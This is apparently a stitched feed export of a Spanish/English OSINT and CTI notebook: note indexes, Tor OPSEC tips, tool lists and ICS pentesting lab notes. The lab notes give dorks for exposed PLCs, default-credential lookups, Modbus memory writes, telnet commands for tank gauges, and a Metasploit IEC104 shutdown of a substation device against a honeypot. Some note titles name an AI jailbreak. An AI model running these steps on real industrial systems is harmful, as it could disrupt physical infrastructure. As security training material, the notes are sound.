opsec-device-endpoint-security — Cap. 5: hardening de dispositivos, endpoint protection.
opsec-browser-fingerprinting — Cap. 6: browser hardening, fingerprint resistance, content OPSEC.
opsec-network-transport-security — Cap. 7: VPN, Tor, infraestructura de transporte.
opsec-comsec — Cap. 8: COMSEC end-to-end, signal protection.
opsec-data-handling-chain-of-custody — Cap. 9: evidence handling, chain of custody, anti-forensics.
opsec-social-behavioral — Cap. 10: social engineering protection, behavioral OPSEC.
opsec-travel-physical-security — Cap. 11: travel security, physical protection.
opsec-monitoring-audits — Cap. 14: monitoring continuo, auditorias OPSEC, incident response.
opsec-tools-utilities — Cap. 15: tools reference + verification (image, video, audio, text, metadata, workflow).
opsec-checklists — Cap. 16: checklists operativas para usar en campo.
opsec-templates-automation — Cap. 17: templates y snippets de automatizacion.
opsec-source-protection-humint — Cap. 12: source protection, HUMINT interactions.
opsec-advanced-topics — Cap. 13: advanced topics.
Lectura nueva: empieza por opsec-fundamentos, luego sigue el orden numerico (4-13).
Consulta operativa: ve directo al dominio (ej. "voy a montar un sock puppet" -> opsec-identity-compartmentalization). Revision periodica: rotar 1 nota por semana para mantener competencia OPSEC al dia. Lectura obligada antes de operar. No puedes hacer OSINT sin tener este manual interiorizado en sus 13 dimensiones.
tema-opsec-completo-analista ]]>projects/opsec/manual-paranoid-opsec.htmlProjects/opsec/manual-paranoid-opsec.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. OPSEC for .onion TailsOS → USB → bridge-Tor → NO extra proxies Disable scripts Noscript → max Never maximize window (fingerprint) Never use VPN + Tor (traffic correlation) Use bridges if Tor is blocked NoScript to max No window resizing No downloading to persistent disk
tema-darkweb-osint
tema-osint-toolchain-comparativa ]]>projects/osint-tools/deep-dark-web-bible.htmlProjects/osint-tools/deep-dark-web-bible.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. Concepto unico = nota propia.
Ahmia
Aleph Open Search
Fuente complementaria del master osint-references-master. Specialized tools:Dark Web OPSEC:1. Operating system: Tails OS (amnesic) 2. Never use VPN + Tor (traffic correlation) 3. Use bridges if Tor is blocked 4. NoScript to max 5. No window resizing 6. No downloading to persistent disk Importado desde Inbox/Tor Search Engines.md durante consolidacion bulk. Directorio de motores de busqueda que operan dentro de la red Tor. Permiten indexar y buscar contenido en servicios ocultos (.onion). Se mantiene el estado online/offline actualizado.Motores de busqueda Tor / Darknet / Servicios ocultos. Buscar servicios ocultos en la red Tor Investigar mercados y foros darknet Monitorizar contenido en la darknet Descubrir nuevos servicios .onion Ahmia es el motor mas conocido y accesible tambien desde clearnet Torch y Tor66 son los mas populares entre usuarios de Tor Kilos y Recon estaban enfocados en busqueda de mercados (actualmente offline) Los estados online/offline cambian frecuentemente, verificar periodicamente
Ver threat-actor-search para foros darknet
Ver threat-actor-search para mercados darknet
tema-darkweb-osint
tema-osint-toolchain-comparativa ]]>projects/osint-tools/dark-web-search-engines.htmlProjects/osint-tools/dark-web-search-engines.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. Concepto unico = nota propia.
Aeon
Arbor.js
Beaker
Befunky
Bizint
Cacoo
Canva
Chart.js - a javascript library that allows you to create charts easly
chartblocks
Circos
creately
Crossfilter
csvkit
D3js - is a powerful data visualization javascript library.
Data Visualization Catalogue
Datawrapper
Dropmark
dygraphs
easely
Exhibit
Flot
FusionCharts
Google Developers: Charts
GraphX
Highcharts
Hohli
Infogr.am
Inkscape
Java Infovis Toolkit
JpGraph
jqPlot - A Versatile and Expandable jQuery Plotting Plugin.
Knoema
Leaflet - an open-source JavaScript library for mobile-friendly interactive maps.
Linkuroius
Listify - Turn a Google spreadsheet into a beautiful, searchable listing in seconds.
LocalFocus
Lucidchart - the intelligent diagramming application that brings teams together to make better decisions and build the future.
Mapline
Nodebox - a family of tools gives you the leverage to create generative design the way you want.
Observable - a modern way to create powerful, performant, polyglot data apps built on open source.
OpenLayers - A high-performance, feature-packed library for all your mapping needs.
Palladio - Visualize complex historical data with ease.
Perspective - interactive data visualization and analytics component, well-suited for large, streaming and static datasets.
Piktochart
Pixxa
Plotly
Preceden - Create a Visual Timeline About Any Topic
QlikView
Quadrigram
Raphael
RAW
Shanti Interactive
Snappa
StoryMap
Tableau Public
Tableau
Tagul
Textures.js
Tik-tok
Tiki-toki
Timeflow
Timeline
Timeline
Timetoast
Venngage
Vis.js
Visme
Visualize Free
Visualize.me
visually
Vortex
ZingChart
tema-curso-ics-pentesting
tema-osint-toolchain-comparativa ]]>projects/osint-tools/infographics-visualization.htmlProjects/osint-tools/infographics-visualization.mdTue, 28 Apr 2026 14:29:12 GMTICS Password List
ICS Master - SCADA Dorks
ICS and IOT Shodan Dork collection
Shodan Website
ipinfo - try 85.26.250.216 and get asn-route then use Shodan with net: <ip/cidr>
google search for cisa ics cert and find CISA ICS
Next Section -> Setup ICS Lab
Back to Table of Contents
tema-curso-ics-pentesting ]]>projects/techint/ics-01-osint.htmlProjects/techint/ics-01-osint.mdTue, 28 Apr 2026 14:29:12 GMTmodbuspal and https://sourceforge.net/projects/modbuspal/files/modbuspal/RC%20version%201.6b/
Next Section -> Pentest Platform Overview
Back to Table of Contents
tema-curso-ics-pentesting ]]>projects/techint/ics-02-setup-lab.htmlProjects/techint/ics-02-setup-lab.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-03-network-scanning.htmlProjects/techint/ceh-03-network-scanning.mdTue, 28 Apr 2026 14:29:12 GMTPLC Practical 1
Back to Table of Contents
tema-curso-ics-pentesting ]]>projects/techint/ics-03-pentest-platform.htmlProjects/techint/ics-03-pentest-platform.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-04-enumeration.htmlProjects/techint/ceh-04-enumeration.mdTue, 28 Apr 2026 14:29:12 GMTShodan Dashboard for port: 102 Siemens SIMATIC 6ES7Use ICS OSINT Dorks with inurl intitle to search for Siemens S7 PLCMost used dork is Portal/Portal.mwsi and use inurl:/Portal/Portal.mwsisearch for default credentials for Siemens devices in ICS OSINT spreadsheetOn Ubuntu VM start conpot with: conpot -f --template defaultSwitch to Kali linux and check network with ifconfig should give the host IP address. Then run netdiscover -r 10.1.0.0/24This gives the conpot address to be `0.1.0.11sudo nmap 10.1.0.11 -Pn -p 1-65535 to scan all hosts.sudo nmap 10.1.0.11 -Pn -sU -p 16100 to scan udp port 16100 on the host.snmp-check -p 16100 10.1.0.11
Next Section -> PLC Practical 2
Back to Table of Contents
tema-curso-ics-pentesting ]]>projects/techint/ics-04-practical-1.htmlProjects/techint/ics-04-practical-1.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-05-vulnerability-analysis.htmlProjects/techint/ceh-05-vulnerability-analysis.mdTue, 28 Apr 2026 14:29:12 GMTReal S7 Hardware
Back to Table of Contents
tema-curso-ics-pentesting ]]>projects/techint/ics-05-practical-2.htmlProjects/techint/ics-05-practical-2.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-06-system-hacking-privesc.htmlProjects/techint/ceh-06-system-hacking-privesc.mdTue, 28 Apr 2026 14:29:12 GMTGas Station Controller
Back to Table of Contents
tema-curso-ics-pentesting ]]>projects/techint/ics-06-real-hardware.htmlProjects/techint/ics-06-real-hardware.mdTue, 28 Apr 2026 14:29:12 GMTPetest Platform. ICS found in Gas Stations as well.Can manipulate a controller via telnetconpot -f --template guardian_ast on the Ubuntu PLC VM using the guardian_ast template. port 10001 Port:10001 device function code I20100 use netdiscover to discover hosts [p] use nmap to scan all ports [p] tcp port 10001 is open AutoGas Systems also shows as linked to the MAC address Lets search for scripts that are linked to AutoGas Systems with atg wildcard. find /usr/share/nmap --name atg*.nse returns /usr/share/nmap/scripts/atg-info.nse sudo namp 10.1.0.11 -p 10001 --script atg-info.nseThis return information from the target tank such as volume, water, temp, etc.I20100 "function code" filetype:pdf as a google search.Vendor Veeder-Root has product TLS-350 Automatic Tank Gauge (ATG)
Google search for ATG Exposed Public and find result from Eric ZhangIn Eric's blog he shows how you can through telnet using port 10001 communicate to atg's. This is how: Telnet into port 10001 of an ATG's IP Type ^A (Ctrl A) followed by I20100 This gives the basic report of the ATG.
For the full list of function codes in the vendor manul see: ATG vendor manualExamples: |Function Code| Description| |--|--| |I20100|In-Tank Inventory Report| |I20200|In-Tank Delivery Report| |I20300|In-Tank Leak Detection Report| |I20400|In-Tank Shift Inventory Report| |I20500|In-Tank Status Report|Check the function codes under telnet with: ^A followed by I20500 for the In-Tank Status Report
Next Section -> Modbus PLC Simulation
Back to Table of Contents
tema-curso-ics-pentesting ]]>projects/techint/ics-07-gas-station-controller.htmlProjects/techint/ics-07-gas-station-controller.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-08-sniffing.htmlProjects/techint/ceh-08-sniffing.mdTue, 28 Apr 2026 14:29:12 GMTPetest Platform. Change mac address of ubuntu VM [p]search for port:502 [VENDOR] Schneider Electric [MODEL-no] TM221CE16 intitle:"Schneider Electric Telecontrol - Industrial Web Control" within ICS_OSINT.xlsx filter on Schneider Electric and their default credentials On ubuntu VM start conpot with conpot -f --template default This start modbus server on port 5020 Use netdiscover to find Schneider Electric hostsUse nmap to discover ports using port range. Ports 22, 2121, 5020, 8800, 10201, 44818 are discovered as open. Run msfconsole and search for modbus modules [p] with search modbus The results in which we are interested are: Modbus Client Utility, Modicon_Stux_Transfer [ladder logic upload/download], and Modicon Remote START/STOP Command Steps: detect modbus find unit ID grab banners use 4 -> Modbus Detectsetg RHOSTS 10.1.0.11 and setg RPORT 5020Then run Detected modbus module use 1 -> Banner GrabbingEnter run to start banner grabbing This function not supported by honeypot- conpot use 3 -> funding unit IDrun Finds multiple unit ID for the honeypot On Kali run sudo java -jar ModbusPal.jarOnce ModbusPal starts, add a modbus slave device with: address 1 name ModbusSim holding register 1-10 and add some random numbers run nmap scan[p] for all tcp portsfind scripts with find /usr/share/nmap -name modbus*.nse finds the modbus-discover.nse script run this with sudo nmap -Pn 10.1.0.11 -p 502 --script modbus--discover.nselaunch metasploit framework [p] and run search modbus use modbus detect [p] use find unit ID [p] could use modbus client [p] but rather use the modbus command line utilities On Kali VM run modbus --help or modbus read --helpRun modbus read 10.1.0.11 %MW0 10 -> Read the first 10 memory blocksRun modbus write 10.1.0.11 %MW0 0000000000 -> Write the first memory block with ten 0
Next Section -> Pentesting Real Modicon Hardware
Back to Table of Contents
tema-curso-ics-pentesting ]]>projects/techint/ics-08-modbus-plc-sim.htmlProjects/techint/ics-08-modbus-plc-sim.mdTue, 28 Apr 2026 14:29:12 GMTPetest Platform. Discover hosts with netdiscoversudo nmap 10.1.0.11 -Pn -p 1-65535 -oN tcp.txt -> discover host ports with NMAP and output to a filefind /usr/share/nmap/ -name modbus*.nse to search for nmap modbus scriptsfind /usr/share/nmap/ -name modicon*.nse to search for nmap modicon scriptssudo nmap 10.1.0.11 -Pn -p 502 --script modicon-info.nse -oN modicon-info.txt use banner grabbing module use find unit id use modbus detect use modicon command module - sudo python2 plcscan.py 10.1.0.11modbus read 10.1.0.11 %MW0 10modbus write 10.1.0.11 %MW0 00000000000 -> 11 memory block written returns the memory blocks read
Back to Table of Contents
tema-curso-ics-pentesting ]]>projects/techint/ics-09-pentesting-modicon.htmlProjects/techint/ics-09-pentesting-modicon.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-10-denial-of-service.htmlProjects/techint/ceh-10-denial-of-service.mdTue, 28 Apr 2026 14:29:12 GMTPetest Platform. INSTRUCTION: Perform a Pentest on a infrastructure substation - shutdown IEC104 substation device Start conpot with conpot -f --template IEC104use netdiscover and nmap port scanning we find port 2404 to be used Search for nmap scripts related to IEC. find /usr/share/nmap/ -name *iec*.nse to search for nmap IEC scripts. Note that iec is in small letters we find the iec script called "iec-identify.nse" sudo nmap 10.1.0.11 -Pn -p 2404 --script iec-identify.nse use the IEC NMAP script we confirm port 2404 open, and also the IEC ASDU adrress to be 7720 Search for IEC yields IEC104 client and use it. set the following in msf -> iec104: RHOSTS = ASDU_ADDRESS = 7720 COMMAND_TYPE = 100 (This is the interrogation command) setg VERBOSE true -> to give detailed outputNow type and enter run Interrogation successful Ammend in msf -> iec104: COMMAND_ADDRESS = 3348 COMMAND_TYPE = 45 (This is the shutdown command) COMMAND_VALUE = 0x00 Now type and enter run Result is IOA: 3348 DIQ: 0x00 -> shows that in command address 3348 there is value of 0x00 which confirms the shutdown command.
Next Section ->
Back to Table of Contents
tema-curso-ics-pentesting ]]>projects/techint/ics-10-pentesting-substation.htmlProjects/techint/ics-10-pentesting-substation.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-11-session-hijacking.htmlProjects/techint/ceh-11-session-hijacking.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-13-hacking-web-servers.htmlProjects/techint/ceh-13-hacking-web-servers.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-14-hacking-web-apps.htmlProjects/techint/ceh-14-hacking-web-apps.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-15-sql-injections.htmlProjects/techint/ceh-15-sql-injections.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-16-wireless-networks.htmlProjects/techint/ceh-16-wireless-networks.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-17-mobile-hacking.htmlProjects/techint/ceh-17-mobile-hacking.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-18-iot-hacking.htmlProjects/techint/ceh-18-iot-hacking.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-19-cloud-computing.htmlProjects/techint/ceh-19-cloud-computing.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo ]]>projects/techint/ceh-20-cryptography.htmlProjects/techint/ceh-20-cryptography.mdTue, 28 Apr 2026 14:29:12 GMTICS Password List
ICS Master - SCADA Dorks
ICS and IOT Shodan Dork collection
Shodan
ipinfo - try 85.26.250.216 and get asn-route then use Shodan with net: <ip/cidr>
google search for cisa ics cert and find CISA ICS Install Virtualbox Create Ubuntu Server 22.04 VM. then the following therein: python3 -> sudo apt install python3 pip3 -> sudo apt install python3-pip honeypots -> sudo pip install honeypots conpot -> pip install conpot snap7 -> sudo pip install python-snap7 install firewall -> sudo apt install ufw disable firewall -> sudo ufw disable install nano -> sudo apt install nano add to path: sudo nano ~/.profile add to bottom of file PATH="$HOME/.local/bin:$PATH" download and install Kali Linux VM. Then the following software therein: plcscan -> sudo git clone https://github.com/meeas/plcscan.git ICSSecurityScripts -> sudo git clone https://github.com/tijldeneut/ICSSecurityScripts.git NMAP scripts from RedPoint-> sudo git clone https://github.com/digitalbond/Redpoint.git install modbus cli -> sudo gem install modbus-cli . Test with modbus --help copy RedPoint nmap scripts to nmap sripts folder usr/share/nmap/scripts. Need root access.
download and install modbuspal and https://sourceforge.net/projects/modbuspal/files/modbuspal/RC%20version%201.6b/ change MAC address of Unbuntu VM with first 6 characters being 00000B on Ubuntu PLC VM start the honeypot with: sudo python3 -m honeypots --setup telnet,http,smb,vnc,snmp on Kali PLC start terminal scan network with: sudo netdiscover -r 10.1.0.0/24 after finding the hosts, we can discover ports: sudo nmap -Pn 10.1.0.100 -sU -F -> faster scan of UDP ports sudo nmap -Pn 10.1.0.100 -p 161 -> specific port sudo nmap -Pn 10.1.0.100 -p 1-65535 -> all ports snmp-check 10.1.0.100THE toolkit for Pentesting.Start Metasploit with: sudo msfconsoleThen in metasploit use: set and setgModule commands: search use info options example: search modbus and returns all the module that can be used use 6 -> number to use the modbusclient info -> to get info on the in use module set RHOSTS 10.1.0.11 -> set remote host of modbus host navigate with cd to plcscan folder my plcscan folder is in ~\gits\plcscan sudo python2 plcscan.py 10.1.0.11 navigate with cd to ICSSecurityScripts folder my plcscan folder is in ~\gits\ICSSecurityScripts sudo python3 SiemensScan.py modbus [OPTIONS] SUBCOMMANDS [ARG] -> subcommands include read,write,dump
tema-curso-ics-pentesting ]]>projects/techint/ics-pentest-course-overview.htmlProjects/techint/ics-pentest-course-overview.mdTue, 28 Apr 2026 14:29:12 GMTred-team-siemens-spectrum-power - Analisis de seguridad ICS relacionado Controles CTRL.04, CTRL.05, CTRL.09, CTRL.112, CTRL.84 del marco de referencia del cliente
tema-curso-ics-pentesting ]]>projects/techint/ics-plan-pruebas-cliente.htmlProjects/techint/ics-plan-pruebas-cliente.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ics-pentesting ]]>projects/techint/red-team-siemens-spectrum-power.htmlProjects/techint/red-team-siemens-spectrum-power.mdTue, 28 Apr 2026 14:29:12 GMTscada-siemens-spectrum-power Conocer los protocolos propietarios es esencial para planificar pentesting de entornos ICS
scada-siemens-spectrum-power -- Requisitos de ciberseguridad de Siemens SP7 ICS Pentesting Course NERC CIP Standards
tema-curso-ics-pentesting ]]>projects/techint/scada-acronimos-comunicaciones.htmlProjects/techint/scada-acronimos-comunicaciones.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ics-pentesting ]]>projects/techint/scada-analisis-debilidades.htmlProjects/techint/scada-analisis-debilidades.mdTue, 28 Apr 2026 14:29:12 GMTscada-acronimos-comunicaciones -- Glosario de acronimos ICS y protocolos industriales NIST Cybersecurity Framework ISO 27001 Purdue Model for ICS/SCADA
tema-curso-ics-pentesting ]]>projects/techint/scada-siemens-spectrum-power.htmlProjects/techint/scada-siemens-spectrum-power.mdTue, 28 Apr 2026 14:29:12 GMTceh-18-iot-hacking cubre la arquitectura de referencia: el modelo Purdue segmenta la red industrial en niveles (0: proceso físico, 1: controladores PLC/RTU, 2: supervisión SCADA/HMI, 3: operaciones, 3.5: DMZ, 4-5: enterprise IT). La convergencia IT/OT elimina el air gap que históricamente protegía los niveles inferiores.
scada-acronimos-comunicaciones documenta los protocolos clave: Modbus TCP/RTU, DNP3, IEC 61850, OPC UA, PROFINET. Muchos carecen de autenticación o cifrado nativo.
ems-stride-mitre-attack aplica STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, DoS, Elevation of Privilege) al sistema de gestión energética, mapeando cada amenaza a tácticas MITRE ATT&CK for ICS.
red-team-siemens-spectrum-power va más allá: identifica 6 rutas de ataque contra Siemens Spectrum Power, con tabla de CVEs específicos, scoring CVSS, y priorización por impacto en el sistema eléctrico.
threat-actor-sandworm (GRU Unit 74455) es el actor de referencia en ataques a infraestructuras críticas: BlackEnergy (2015), Industroyer (2016), NotPetya (2017). Su modus operandi combina spearphishing inicial con movimiento lateral hacia redes OT y despliegue de malware ICS-specific.
ciberguerra-ia-infraestructuras-criticas analiza la tendencia macro: la convergencia de capacidades ofensivas estatales con IA acelera la cadencia y sofisticación de ataques a infraestructura crítica (energía, agua, transporte).
ics-plan-pruebas-cliente establece el framework de engagement: cuestionario de scoping, requisitos de seguridad física, limitaciones de testing en entornos OT en producción, y criterios de "do no harm".
scada-analisis-debilidades documenta la metodología de red team para entornos ICS: reconocimiento pasivo de protocolos industriales, enumeración de PLCs y HMIs, explotación de configuraciones default, y post-explotación con impacto simulado en el proceso físico.
scada-siemens-spectrum-power establece los requisitos de seguridad alineados con NIST CSF: identificación de activos OT, protección de comunicaciones (segmentación, cifrado), detección de anomalías en tráfico industrial, y recuperación ante incidentes. La seguridad ICS no es seguridad IT aplicada a otro entorno — es una disciplina diferente. El impacto de un fallo no es pérdida de datos sino daño físico. El pentesting debe priorizar la no-disrupción. Y la defensa empieza por la segmentación (modelo Purdue) mucho antes que por el EDR.
tema-curso-ics-pentesting ]]>projects/techint/ics-scada-superficie-ataque.htmlProjects/techint/ics-scada-superficie-ataque.mdTue, 28 Apr 2026 14:29:12 GMTblockchain-crypto-investigation
reporte-ejemplo-blockchain-1
reporte-ejemplo-blockchain-2 ]]>themes/tema-blockchain-finint.htmlThemes/tema-blockchain-finint.mdTue, 28 Apr 2026 14:28:40 GMTcertsg-irm-01-worm-infection
certsg-irm-02-windows-intrusion
certsg-irm-03-unix-linux-intrusion
certsg-irm-04-ddos
certsg-irm-05-malicious-network-behaviour
certsg-irm-06-website-defacement
certsg-irm-07-windows-malware
certsg-irm-08-blackmail
certsg-irm-09-smartphone-malware
certsg-irm-10-social-engineering
certsg-irm-11-information-leakage
certsg-irm-12-insider-abuse
certsg-irm-13-customer-phishing
certsg-irm-14-scam
certsg-irm-15-trademark-infringement
certsg-irm-16-phishing
certsg-irm-17-ransomware
certsg-irm-18-large-scale-compromise ]]>themes/tema-incident-response-irm.htmlThemes/tema-incident-response-irm.mdTue, 28 Apr 2026 14:28:40 GMTcti-recursos-juniors-unificado §C resume la doctrina minima viable.Faltan entities sobre: Multiple Hypothesis Generation aplicada a CTI moderno, Bayesian updating en threat intel, calibracion del propio analista (Tetlock superforecasters), y cross-cultural cognitive biases (mas alla del canon Heuer-WEP norteamericano).
campaign-solarwinds-2020
ciclo-de-inteligencia
cti-recursos-juniors-unificado
doctrina-minima-viable
entidad-ach
entidad-admiralty-system
entidad-bushidouk-rfi-template
entidad-curated-intelligence-threat-actor-profile
entidad-cyber-kill-chain
entidad-devils-advocacy
entidad-diamond-model
entidad-first-org
entidad-icd-203
entidad-idir-templates
entidad-indicators-signposts
entidad-key-assumptions-check
entidad-kraven-security-cti-template
entidad-misp
entidad-mitre-attack
entidad-mitre-attack-navigator
entidad-mitre-corporation
entidad-mitre-cti-blueprints
entidad-mom-pop-moses-eve
entidad-multiple-hypothesis-generation
entidad-odni
entidad-opencti
entidad-phia-yardstick
entidad-psychology-intelligence-analysis
entidad-quality-of-information-check
entidad-randolph-pherson
entidad-richards-heuer
entidad-robert-clark
entidad-sherman-kent
entidad-stix-taxii
entidad-thehive
entidad-tlp-v2
entidad-unified-kill-chain
entidad-wep
entidad-zeltser-cti-template
fuentes-a1-vendors-gold-standard
fundamentos-osint
glosario-cti-cth
guia-escritura-inteligencia
legal-considerations-osint
metodologia-4-pasos-osint
osint-analysis-intelligence-report-writing
osint-learning-resources
osint-mastery-learning
professional-methodologies
roadmap-90-dias-junior
sesgos-cognitivos-analista
threat-actor-apt28
threat-actor-sandworm
threat-actor-search ]]>themes/tema-cti-fundamentos-doctrina.htmlThemes/tema-cti-fundamentos-doctrina.mdTue, 28 Apr 2026 14:28:40 GMTceh-00-start-here
ceh-01-introduction
ceh-02-footprinting-recon
ceh-03-network-scanning
ceh-04-enumeration
ceh-05-vulnerability-analysis
ceh-06-system-hacking-privesc
ceh-07-malware-threats
ceh-08-sniffing
ceh-09-social-engineering
ceh-10-denial-of-service
ceh-11-session-hijacking
ceh-12-evading-ids-firewall
ceh-13-hacking-web-servers
ceh-14-hacking-web-apps
ceh-15-sql-injections
ceh-16-wireless-networks
ceh-17-mobile-hacking
ceh-18-iot-hacking
ceh-19-cloud-computing
ceh-20-cryptography ]]>themes/tema-curso-ceh-completo.htmlThemes/tema-curso-ceh-completo.mdTue, 28 Apr 2026 14:28:40 GMTcti-basics-for-beginners
ics-01-osint
ics-02-setup-lab
ics-03-pentest-platform
ics-04-practical-1
ics-05-practical-2
ics-06-real-hardware
ics-07-gas-station-controller
ics-08-modbus-plc-sim
ics-09-pentesting-modicon
ics-10-pentesting-substation
ics-pentest-course-overview
ics-plan-pruebas-cliente
ics-scada-superficie-ataque
infographics-visualization
red-team-siemens-spectrum-power
scada-acronimos-comunicaciones
scada-analisis-debilidades
scada-siemens-spectrum-power ]]>themes/tema-curso-ics-pentesting.htmlThemes/tema-curso-ics-pentesting.mdTue, 28 Apr 2026 14:28:40 GMTdark-web-search-engines
deep-dark-web-bible
pastebins ]]>themes/tema-darkweb-osint.htmlThemes/tema-darkweb-osint.mdTue, 28 Apr 2026 14:28:40 GMTchecklist-ai-detection
content-verification
manual-ai-media-forensics ]]>themes/tema-deepfakes-ai-forensics.htmlThemes/tema-deepfakes-ai-forensics.mdTue, 28 Apr 2026 14:28:40 GMTentidad-odni
entidad-randolph-pherson
entidad-richards-heuer
entidad-robert-clark
entidad-sherman-kent ]]>themes/tema-figuras-doctrinales-ic.htmlThemes/tema-figuras-doctrinales-ic.mdTue, 28 Apr 2026 14:28:40 GMTfacial-recognition
geospatial-mapping
image-analysis
image-search
maritime-osint
reporte-ejemplo-geoint-1
reporte-ejemplo-geoint-2
video-tools
visual-search-clustering ]]>themes/tema-geoint-completo.htmlThemes/tema-geoint-completo.mdTue, 28 Apr 2026 14:28:40 GMTentidad-cyber-kill-chain
entidad-diamond-model
entidad-unified-kill-chain ]]>themes/tema-kill-chains-comparativa.htmlThemes/tema-kill-chains-comparativa.mdTue, 28 Apr 2026 14:28:40 GMTceh-07-malware-threats
certsg-irm-07-windows-malware
certsg-irm-09-smartphone-malware ]]>themes/tema-malware-cadena-completa.htmlThemes/tema-malware-cadena-completa.mdTue, 28 Apr 2026 14:28:40 GMTentidad-mitre-attack
entidad-mitre-attack-navigator
entidad-mitre-corporation
entidad-mitre-cti-blueprints ]]>themes/tema-mitre-attack-ecosistema.htmlThemes/tema-mitre-attack-ecosistema.mdTue, 28 Apr 2026 14:28:40 GMTceh-09-social-engineering
ceh-12-evading-ids-firewall
cisa-red-team-assessment-critical-infra
guia-opsec-carrefour
ingenieria-social-compromiso-credenciales
manual-paranoid-opsec
opsec-advanced-topics
opsec-browser-fingerprinting
opsec-checklists
opsec-comsec
opsec-data-handling-chain-of-custody
opsec-device-endpoint-security
opsec-fundamentos
opsec-identity-compartmentalization
opsec-monitoring-audits
opsec-network-transport-security
opsec-social-behavioral
opsec-source-protection-humint
opsec-templates-automation
opsec-tools-utilities
opsec-travel-physical-security
plan-ejercicio-vishing
privacy-encryption-tools
privacy-search-engines
rayhunter-cellular-spying-detection
sistema-anonimizacion-texto
vpn-services
waffled-bypass-castellano ]]>themes/tema-opsec-completo-analista.htmlThemes/tema-opsec-completo-analista.mdTue, 28 Apr 2026 14:28:40 GMTosint-references-master. Este theme las compara para que el junior elija cual usar segun el caso.
Cada master cubre OSINT desde un angulo: awesome-osint (jivoi) = catalogo plano de tools por categoria (1700+ links, mantenimiento comunitario activo); OSINT Bible 2026 = compilacion procedimental con metodologia 4-pasos + ethics + automation Python (33 capitulos numerados, mas didactico); OSINT Mastery (Jamba Academy) = enfoque de "libro" con repository structure y categorizacion de templates (mas meta-discurso del repo que contenido). El master unificado osint-references-master indexa 82 atomicas con marcador de origen [A]/[B]/[A+B].Para descubrir tools nuevas: empezar por awesome-osint. Para procedimientos paso-a-paso: OSINT Bible. Para entender un repo curado complete: Jamba Mastery. NO leas los 3 enteros — usa el master unificado como indice y abre solo las atomicas relevantes a tu tarea concreta.
Falta una reference catch-all en castellano (las 3 son inglesa). Faltan references especializadas en OPSEC del OSINT analyst (que vamos a tener cuando se cree el theme tema-opsec-completo-analista).
osint-mastery-guide
osint-mastery-learning
osint-mastery-tools
osint-references-master
osint360-gpt ]]>themes/tema-osint-references-master-deep-dive.htmlThemes/tema-osint-references-master-deep-dive.mdTue, 28 Apr 2026 14:28:40 GMTosint-references-master como indice cuando necesites una tool concreta. Para nuevos juniors: empezar leyendo general-search-engines + google-dorks-tools + tools-mind-map (esos 3 cubren el 60% del trabajo OSINT diario).Faltan notas profundas sobre: SOCMINT especifico Telegram (canales + grupos privados), CTI feeds API (programmatic access), y scraping legal/ethical (paneles ToS, GDPR considerations).
academic-resources
ai-intelligence-osint
ai-search-engines
all-in-one-frameworks
automation-python-osint
chatgpt-jailbreak-tier5
code-search
dark-web-search-engines
data-statistics
deep-dark-web-bible
document-slides-search
extra-osint-resources
fact-checking
file-search
general-search-engines
google-dorks-tools
infographics-visualization
internet-search-bible
keywords-discovery
lampyre-tool
language-tools
maltego-advanced
meta-search-engines
national-search-engines
news-digest-discovery
news-osint
osint-mastery-tools
osint-tools-tabla
other-osint-tools
privategpt-local-llm
querytool-google-sheet
similar-sites-search
speciality-search-engines
spiderfoot-correlations
tools-mind-map
web-monitoring
web-niveles-deep-dark ]]>themes/tema-osint-toolchain-comparativa.htmlThemes/tema-osint-toolchain-comparativa.mdTue, 28 Apr 2026 14:28:40 GMTcompany-research
email-investigation
expert-search
job-search-resources
people-investigations
phone-research
qa-sites
reporte-ejemplo-company-investigation
reporte-ejemplo-individual-investigation
vehicle-research ]]>themes/tema-persint-corpint-completo.htmlThemes/tema-persint-corpint-completo.mdTue, 28 Apr 2026 14:28:40 GMTcertsg-irm-13-customer-phishing
certsg-irm-16-phishing
use-case-06-phishing-intelligence ]]>themes/tema-phishing-completo.htmlThemes/tema-phishing-completo.mdTue, 28 Apr 2026 14:28:40 GMTcertsg-irm-17-ransomware
data-breach-search-engines
threat-actor-search
threat-intelligence-feeds ]]>themes/tema-ransomware-actores-y-respuesta.htmlThemes/tema-ransomware-actores-y-respuesta.mdTue, 28 Apr 2026 14:28:40 GMTcti-osint-cheatsheet
guia-escritura-inteligencia
osint-analysis-intelligence-report-writing
plantilla-asset-investigation
plantilla-breach-analysis
plantilla-communication-patterns
plantilla-de-informe-de-pentesting-web-xss-y-sql-injection
plantilla-domain-website
plantilla-domains-and-ip-addresses-investigation-template
plantilla-individual-investigation
plantilla-informe-cti-osint-data-leak
plantilla-informe-técnico-para-el-equipo-del-soc-tecnico-amenaza-de
plantilla-modelo-de-reporting-amenaza-de-hacktivismo-contra-agencia
plantilla-network-recon
plantilla-personal-information-target-file
plantilla-plantillas-de-prompts-para-reportes-cti-vulnerabilidades-y-n
